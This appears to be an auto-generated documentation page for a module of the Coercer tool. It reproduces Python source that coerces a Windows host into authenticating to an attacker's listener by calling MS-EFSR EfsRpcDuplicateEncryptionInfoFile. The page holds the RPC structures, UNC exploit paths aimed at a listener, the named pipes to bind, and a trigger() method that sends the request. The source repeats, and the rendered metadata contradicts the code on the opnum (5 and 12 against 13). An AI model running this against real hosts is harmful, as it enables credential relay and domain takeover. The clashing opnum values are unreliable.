coercer.methods.MS_EFSR.EfsRpcDuplicateEncryptionInfoFile
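#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcDuplicateEncryptionInfoFile.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class EFS_RPC_BLOB(NDRSTRUCT):
    """
    NDR layout of the EFS_RPC_BLOB argument (RelativeSD): a DWORD followed by
    a char pointer. trigger() sends it freshly constructed, i.e. zeroed.

    NOTE(review): MS-EFSR names the DWORD ``cbData`` and the pointer ``bData``;
    the names below are the other way round. The wire layout is identical, so
    they are left untouched — verify against the spec before relying on them.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class _EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    ``opnum`` is the operation number actually put on the wire; the
    ``function["opnum"]`` metadata of EfsRpcDuplicateEncryptionInfoFile below
    must agree with it.
    """
    opnum = 13
    structure = (
        ('SrcFileName', WSTR),  # Type: wchar_t *
        ('DestFileName', WSTR),  # Type: wchar_t *
        ('dwCreationDisposition', DWORD),  # Type: DWORD
        ('dwAttributes', DWORD),  # Type: DWORD
        ('RelativeSD', EFS_RPC_BLOB),  # Type: EFS_RPC_BLOB *
        ('bInheritHandle', BOOL),  # Type: BOOL
    )


class _EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Empty: trigger() does not inspect the response payload.
    """
    structure = ()


class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 13) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)

    The opnum quoted above and in ``function`` is the one defined on
    ``_EfsRpcDuplicateEncryptionInfoFile`` (the value sent on the wire).
    """

    # Path templates; presumably rendered into self.path by the framework
    # (see MSPROTOCOLRPCCALL). The trailing "\x00" terminates the wchar_t
    # string declared in the NDRCALL structure.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface UUIDs the framework may bind to.
    # NOTE(review): the key is spelled "ncan_np" rather than the RPC protocol
    # sequence name "ncacn_np"; it is a framework-level lookup key, so it is
    # kept verbatim.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Descriptive metadata. "opnum" is kept equal to
    # _EfsRpcDuplicateEncryptionInfoFile.opnum (13); the docstring and this
    # dict previously disagreed with that value.
    function = {
        "name": "EfsRpcDuplicateEncryptionInfoFile",
        "opnum": 13,
        "vulnerable_arguments": ["SrcFileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDuplicateEncryptionInfoFile request on an already bound
        DCERPC session.

        Args:
            dcerpc_session: bound DCERPC session, or None if connect() was not called.
            target: unused here; kept for the MSPROTOCOLRPCCALL trigger() interface.

        Returns:
            "" when the request was sent without raising, the caught Exception
            instance when the call failed, or None when no session was given.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDuplicateEncryptionInfoFile()
            # vulnerable_arguments lists only SrcFileName; DestFileName is
            # set to the same rendered path.
            request['SrcFileName'] = self.path
            request['DestFileName'] = self.path
            request['dwCreationDisposition'] = 0
            request['dwAttributes'] = 0
            request['RelativeSD'] = EFS_RPC_BLOB()
            request['bInheritHandle'] = 0
            # The response payload is not examined, so it is not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Returned rather than raised: callers interpret the value.
            return err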
class
EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
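class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 13) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)

    The opnum quoted above and in ``function`` is the one defined on
    ``_EfsRpcDuplicateEncryptionInfoFile`` (the value sent on the wire).
    """

    # Path templates; presumably rendered into self.path by the framework
    # (see MSPROTOCOLRPCCALL). The trailing "\x00" terminates the wchar_t
    # string declared in the NDRCALL structure.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface UUIDs the framework may bind to.
    # NOTE(review): the key is spelled "ncan_np" rather than the RPC protocol
    # sequence name "ncacn_np"; it is a framework-level lookup key, so it is
    # kept verbatim.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Descriptive metadata. "opnum" is kept equal to
    # _EfsRpcDuplicateEncryptionInfoFile.opnum (13); the docstring and this
    # dict previously disagreed with that value.
    function = {
        "name": "EfsRpcDuplicateEncryptionInfoFile",
        "opnum": 13,
        "vulnerable_arguments": ["SrcFileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDuplicateEncryptionInfoFile request on an already bound
        DCERPC session.

        Args:
            dcerpc_session: bound DCERPC session, or None if connect() was not called.
            target: unused here; kept for the MSPROTOCOLRPCCALL trigger() interface.

        Returns:
            "" when the request was sent without raising, the caught Exception
            instance when the call failed, or None when no session was given.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDuplicateEncryptionInfoFile()
            # vulnerable_arguments lists only SrcFileName; DestFileName is
            # set to the same rendered path.
            request['SrcFileName'] = self.path
            request['DestFileName'] = self.path
            request['dwCreationDisposition'] = 0
            request['dwAttributes'] = 0
            request['RelativeSD'] = EFS_RPC_BLOB()
            request['bInheritHandle'] = 0
            # The response payload is not examined, so it is not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Returned rather than raised: callers interpret the value.
            return err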
Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of MS-EFSR Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function =
{'name': 'EfsRpcDuplicateEncryptionInfoFile', 'opnum': 12, 'vulnerable_arguments': ['SrcFileName']}
def
trigger(self, dcerpc_session, target):
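def trigger(self, dcerpc_session, target):
    """
    Send one EfsRpcDuplicateEncryptionInfoFile request on an already bound
    DCERPC session.

    Args:
        dcerpc_session: bound DCERPC session, or None if connect() was not called.
        target: unused here; kept for the MSPROTOCOLRPCCALL trigger() interface.

    Returns:
        "" when the request was sent without raising, the caught Exception
        instance when the call failed, or None when no session was given.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _EfsRpcDuplicateEncryptionInfoFile()
        # vulnerable_arguments lists only SrcFileName; DestFileName is set
        # to the same rendered path.
        request['SrcFileName'] = self.path
        request['DestFileName'] = self.path
        request['dwCreationDisposition'] = 0
        request['dwAttributes'] = 0
        request['RelativeSD'] = EFS_RPC_BLOB()
        request['bInheritHandle'] = 0
        # The response payload is not examined, so it is not kept.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Returned rather than raised: callers interpret the value.
        return err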